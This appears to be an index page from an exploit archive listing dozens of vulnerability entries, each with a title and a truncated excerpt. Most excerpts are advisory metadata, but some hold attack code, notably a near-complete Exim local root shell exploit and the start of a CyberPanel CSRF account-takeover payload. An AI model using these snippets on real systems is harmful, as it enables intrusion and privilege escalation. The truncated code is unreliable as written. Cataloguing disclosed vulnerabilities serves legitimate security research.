EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution Date: 2020-02-01 Exploit Author: Clément Billac Vendor Homepage: https://www.eyesofnetwork.com/ Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x8664-bin.iso Version: 5.3 CVE :...
Genexis Platinum-4410 2.1 - Authentication Bypass
Genexis Platinum-4410 2.1 - Authentication Bypass Exploit Title: Genexis Platinum-4410 2.1 - Authentication Bypass Date: 20220-01-08 Exploit Author: Husinul Sanub Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/ Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Route...
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation Date: 2019-01-22 Exploit Author: Chris Lyne @lynerc Vendor Homepage: https://www.nagios.com/ Product: Nagios XI Software Link:...
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
yahoo.com
Pentest notes for: google.com Exploit Pack Nmap 7.70 scan initiated Mon Sep 24 23:08:15 2018 as: C:\Program Files x86\Nmap\nmap.exe -sV -A -oA log/google.com google.com Nmap scan report for google.com 172.217.19.206 Host is up 0.027s latency. rDNS record for 172.217.19.206:...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 20...
Tenda AC15 Router - Remote Code Execution
Tenda AC15 Router - Remote Code Execution !/usr/bin/env python EDB Note Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ import urllib2 import struct import time import socket from optparse import import SimpleHTTPServer import SocketServer import threading import sys...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
Cisco IOS - Remote Code Execution
Cisco IOS - Remote Code Execution !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco...
Microsoft Windows 10 - nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry) Pool Memory Disclosure
Microsoft Windows 10 - nt!NtQueryDirectoryFile luafv!LuafvCopyDirectoryEntry Pool Memory Disclosure / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1361 We have discovered that the nt!NtQueryDirectoryFile system call discloses portions of uninitialized pool memory to user-mode...
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation /Functions/UpdateAdmin-Databases.php file. Remote attackers are able to request crafted data of the POST method request with the vulnerable ´accesrole´ parameter. The security risk of the privilege escalation web vulnerability ...
Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
Google Android - Stagefright Remote Code Execution
Google Android - Stagefright Remote Code Execution !/usr/bin/env python Joshua J. Drake @jduck of ZIMPERIUM zLabs Shout outs to our friends at Optiv formerly Accuvant Labs C Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 www.zimperium.com Exploit for RCE Vulnerability CVE-2015-153...
Libuser Library - Multiple Vulnerabilities
Libuser Library - Multiple Vulnerabilities Qualys Security Advisory CVE-2015-3245 userhelper chfn newline filtering CVE-2015-3246 libuser passwd file handling -- Summary ----------------------------------------------------------------- The libuser library implements a standardized interface for...
phpMyBitTorrent 2.04 - Multiple Vulnerabilities
phpMyBitTorrent 2.04 - Multiple Vulnerabilities waraxe-2012-SA091 - Multiple Vulnerabilities in phpMyBitTorrent 2.04 =============================================================================== Author: Janek Vind "waraxe" Date: 01. October 2012 Location: Estonia, Tartu Web:...
Microsoft Windows - NTLM Weak Nonce (MS10-012)
Microsoft Windows - NTLM Weak Nonce MS10-012 Windows SMB NTLM Authentication Weak Nonce Vulnerability Security Advisory Hernan Ochoa [email protected] - Agustin Azubel [email protected] Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability Advisory ID: OCHOA-2010-0209...
Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer
Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | ' + self.eol else: self.content += self.eol + data + self.eol self.content += 'endobj' + self.eol def objSWFStreamself, objnum, data, stream:...
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6 - HFS FileSystem Denial of Service // -----BEGIN PGP SIGNED MESSAGE----- // Hash: SHA1 / Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack Denial of Service by Maksymilian Arciemowicz from SecurityReason.com...
Joomla! Component com_yanc - SQL Injection
Joomla! Component comyanc - SQL Injection ============================================================================== » Joomla comyanc Remote Sql Injection Vulnerability ============================================================================== » Script: Joomla » Language: PHP » Founder:...
list Web - addlink.php?id SQL Injection
list Web - addlink.php?id SQL Injection | | list Web addlink.php id Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | script : http://maker.ir | | DorK :...
SeaMonkey 1.1.8 - Remote Array Overrun
SeaMonkey 1.1.8 - Remote Array Overrun From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SeaMonkey 1.1.8 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis...
ViArt CMS - forum_topic_new.php?forum_id Cross-Site Scripting
ViArt CMS - forumtopicnew.php?forumid Cross-Site Scripting source: https://www.securityfocus.com/bid/36003/info ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code...
SH-News 3.0 - comments.php SQL Injection
SH-News 3.0 - comments.php SQL Injection ...:::::SH-News 3.0 SQL Injection Vulnerability ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discovered By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to ...
ttCMS 4 - ez_sql.php?lib_path Remote File Inclusion
ttCMS 4 - ezsql.php?libpath Remote File Inclusion DEVIL TEAM - HACKING POLISH TEAM Author: Kacper a.k.a Rahim Contact: [email protected] Homepage: http://www.rahim.webd.pl/ Irc: irc.milw0rm.com:6667 devilteam -------------------------------------------- Greetings to everyone on the IRC channel and...
YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting
YaPiG 0.9x - Thankscomment.php Cross-Site Scripting source: https://www.securityfocus.com/bid/19709/info Yapig is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may let an attacker steal cookie-based authentication credentials and...
DZCP (deV!L_z Clanportal) 1.34 - id SQL Injection
DZCP deV!Lz Clanportal 1.34 - id SQL Injection ? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo...
Microsoft IIS 5.0 - WebDAV Remote
Microsoft IIS 5.0 - WebDAV Remote // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / --------------------------------- / // /...
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection Google Dork: intext:"© GUnet 2003-2007" Date: 2020-03-02 Exploit Author: emaragkos Vendor Homepage: https://www.openeclass.org/ Software Link:...
ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Date: 2019-10-17 Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link:...
CyberPanel 1.8.4 - Cross-Site Request Forgery
CyberPanel 1.8.4 - Cross-Site Request Forgery Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR / A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement OSR allows the compilation of JITed functions that cause type confusions between...
Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal ''' Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. Vulnerabl...
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure ''' Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware Date: 20-03-2018 Exploit Author: David Castro Contact: https://twitter.com/SadFud75 Vendor Homepage: http://www.lutron.com Software Link:...
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
CodeMeter 6.50 - Cross-Site Scripting
CodeMeter 6.50 - Cross-Site Scripting Document Title: =============== Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2074 ID: FB49498 Acknowledgements:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
Liferay CE 6.2 CE GA6 - Persistent Cross-Site Scripting
Liferay CE 6.2 CE GA6 - Persistent Cross-Site Scripting CVE-2016-3670 Stored Cross Site Scripting in Liferay CE 1. Vulnerability Properties Title: Stored Cross-Site Scripting Liferay CE CVE ID: CVE-2016-3670 CVSSv3 Base Score: 4.6 AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N Vendor: Liferay Inc Products:...
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel x86 - Disable ASLR by Setting the RLIMITSTACK Resource to Unlimited Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html CVE-2016-3672 - Unlimiting the stack not longer disables ASLR Authors: Hector Marco & Ismael Ripoll CVE: CVE-2016-3672...
IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities
IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple severe vulnerabilities product: IBM Algorithmics RICO...
Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities
Oracle WebCenter Sites FatWire Content Server - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities in Oracle WebCenter Sites product: Oracle WebCenter Sites former FatWire...
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service From: http://jon.oberheide.org/files/sctp-boom.py !/usr/bin/env python ''' sctp-boom.py Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 The sctpprocessunkparam function in...
IBM AIX 5.66.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.66.1 - LIBINITDBG Arbitrary File Overwrite via Libc Debug !/bin/sh $Id: raptorlibC,v 1.1 2009/09/10 15:08:04 raptor Exp $ raptorlibC - AIX arbitrary file overwrite via libC debug Copyright c 2009 Marco Ivaldi Property of @ Mediaservice.net Srl Data Security Division...
Web Directory PRO - Admins.php Change Admin Password
Web Directory PRO - Admins.php Change Admin Password change password Web Directory PRO MODIFY Login Password TypeSubadminAdmin Categories ArtBusinessComputersGamesHealth & FitnessNewsSportsRecreationInternetTeen & KidsReferenceEducationRegionalSocietyScienceHome & FamilyWorldShoppingWeb...
Sun xVM VirtualBox 1.6.4 - Privilege Escalation (PoC)
Sun xVM VirtualBox 1.6.4 - Privilege Escalation PoC -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory Information Title: Sun xVM VirtualBox Privilege...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Squirrelcart 2.2.0 - cart_content.php Remote File Inclusion
Squirrelcart 2.2.0 - cartcontent.php Remote File Inclusion Title : Squirrelcart = 2.2.0 Remote File Inclusion URL : http://www.ldev.com/ google Dork : inurl:/squirrelcart/ Author : OLiBekaS greetz : Skulmatic, weleh, brokencode, bigmaster and all papmahackerlink crew Exploit :...
ACal 2.2.6 - day.php Remote File Inclusion
ACal 2.2.6 - day.php Remote File Inclusion $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit:...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpLinks 2.1.2 - Multiple Vulnerabilities
phpLinks 2.1.2 - Multiple Vulnerabilities phpLinks Multiple Vulnerabilities Vendor: destiney.com Product: phpLinks Version: = 2.1.2 Website: http://phplinks.sourceforge.net/ BID: 6632 6633 Description: phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link far...
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection !/usr/bin/python """ Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows 64-bit - Release: 11.21 - Release Date:...